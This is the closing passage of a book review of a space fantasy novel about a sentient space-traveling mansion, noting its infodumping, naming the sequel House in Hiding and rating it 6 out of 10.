Innkeeper stories, you'll be disappointed. But if you just want to spend some time with a giant sentient space-traveling mansion inhabited by unlikely misfits, and you don't mind large amounts of space fantasy infodumping, consider giving this a shot. I had fun with it and plan on reading the rest of the omnibus. Followed by House in Hiding. Rating: 6 out of 10

Next.

Previous.